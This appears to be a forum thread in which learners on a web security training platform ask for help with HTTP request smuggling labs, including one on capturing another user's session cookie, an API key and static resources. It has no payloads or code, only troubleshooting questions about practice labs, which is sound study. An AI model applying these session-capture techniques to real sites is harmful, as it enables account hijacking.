New lab: Exploiting HTTP request smuggling to capture other users' requests
Hi and sorry for bothering again.
I am not able to complete the lab in the subject after following the lab solution.
As far as I understand, there should be "another user" accessing the blog comments page, whose session cookie should be captured thank you to my previous "smuggled" request.
I wait for several minutes, but when I refresh the page, the only credentials that are captured are mine. I send my smuggled request only once, and not twice as in the other exercises, as I understand that the second request is the one from the other user "bot".
Is this correct?
Thank you in advance,
Thanks for letting us know Luca.
I cannot find a way to get an API key different from the one that is already accessible with the given user - and that key is not accepted as solution for the lab.
I'm not entirely sure which key I should suppose to retrieve, another bot?
Can you please help me on this last lab?
I had a lot more problems solving the "Exploiting HTTP request smuggling to capture other users' requests" lab and only figured out what I was doing wrong after 3-4 days of trying.
Now how do I check the static resources? I tried to use Chrome Inspect tool and check the resources folder but they just look the same every time. Is that the right way to check the .js static resources?
Do I have to be logged in as carlos when I refresh the home page in incognito browser?